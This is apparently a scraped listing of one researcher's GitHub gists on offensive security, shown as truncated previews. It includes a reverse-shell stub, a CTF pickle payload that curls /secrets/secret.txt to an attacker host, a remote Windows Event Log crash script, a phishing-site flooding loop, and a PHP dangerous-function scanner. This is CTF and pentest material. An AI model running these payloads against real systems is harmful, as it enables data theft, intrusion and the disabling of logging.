#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Ricardo ricardojba
ricardojba
/ sctp_reverse_shell.py
Created
December 3, 2018 17:29
— forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765 | |
| # Connect with `ncat --sctp -lvp 1234` | |
| import os, socket, subprocess | |
| RHOST = '127.0.0.1' | |
| RPORT = 1234 |
ricardojba
/ 0xOPOSEC 0x70 Challenge
Last active
May 29, 2022 11:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- challenge 1: | |
| From the name of the challenge it was a dead giveway that there was a .git folder exposed. | |
| Then just find out where the git repo is hosted: | |
| curl http://0x70.apl3b.com/.git/config | |
| And get the repo hosting service: | |
| https://gitlab.com/DDuarte/twipy.git | |
| Finally check all the commits and on this one at the bottom of the page you can read a flag: |
ricardojba
/ 0xOPOSEC 0x71 Challenge
Created
February 8, 2019 15:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cposix | |
| system | |
| p0 | |
| (S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444' | |
| p1 | |
| tp2 | |
| Rp3 | |
| . | |
| FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!} |
ricardojba
/ php-egrep-sast-scan.sh
Created
September 3, 2019 10:51
— forked from mgeeky/php-egrep-sast-scan.sh
egrep expression to scan PHP sources for invocation of potentially dangerous functions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| P="*" | |
| if [ -n "$1" ]; then | |
| P="$1" | |
| fi | |
| grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s |
ricardojba
/ gist:ab090df0b0c294f09940213e526e728f
Created
March 22, 2020 15:02
Executing R Scripts in MSSQL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # original https://pastebin.com/zBDnzELT | |
| Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common. | |
| Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script(). | |
| This can be 'fun'.. | |
| Sample R query in MS-SQL (from MSDN): | |
ricardojba
/ Wireless Penetration Testing Cheat Sheet.md
Created
April 27, 2020 15:40
— forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet
ricardojba
/ xor.py
Last active
July 6, 2020 11:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| def xor(data,key): | |
| return bytearray(((data[i]^key[i%len(key)]) for i in range(0,len(data)))) | |
| data = bytearray(open("my_magic_bytes.jpg.enc","rb").read()) | |
| # Known plaintext from wikipedia https://en.wikipedia.org/wiki/List_of_file_signatures - XOR the enc file with it first | |
| #key = bytearray([0xFF,0xD8,0xFF,0xE0,0x00,0x10,0x4A,0x46,0x49,0x46,0x00,0x01]) | |
| # 12 bytes key extracted from the file after the first above XOR | |
| key = bytearray([0x46,0xcc,0xf9,0xa5,0x71,0xf0,0xff,0xb1,0x7e,0x41,0xcb,0x84]) |
ricardojba
/ trash.sh
Created
August 14, 2020 09:35
— forked from geek-at/trash.sh
The script used to trash a banking phishing site
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| while :; do | |
| verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1) | |
| pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1) | |
| ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))") | |
ricardojba
/ eventvwr_crash.py
Created
September 26, 2020 20:38
— forked from byt3bl33d3r/eventvwr_crash.py
Crash the Windows Event Log service remotely (needs admin privs)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Crash the Windows Event Log Service remotely, needs Admin privs | |
| # originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r | |
| # | |
| # Once the service crashes 3 times it will not restart for 24 hours | |
| # | |
| # https://github.com/limbenjamin/LogServiceCrash | |
| # https://limbenjamin.com/articles/crash-windows-event-logging-service.html | |
| # | |
| # Needs the impacket library (https://github.com/SecureAuthCorp/impacket) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "queries": [{ | |
| "name": "--https://github.com/ZephrFish/Bloodhound-CustomQueries/--", | |
| "queryList": [{ | |
| "final": true, | |
| "query": "" | |
| }] | |
| }, | |
| { | |
| "name": "Return All Azure Users that are part of the 'Global Administrator' Role", |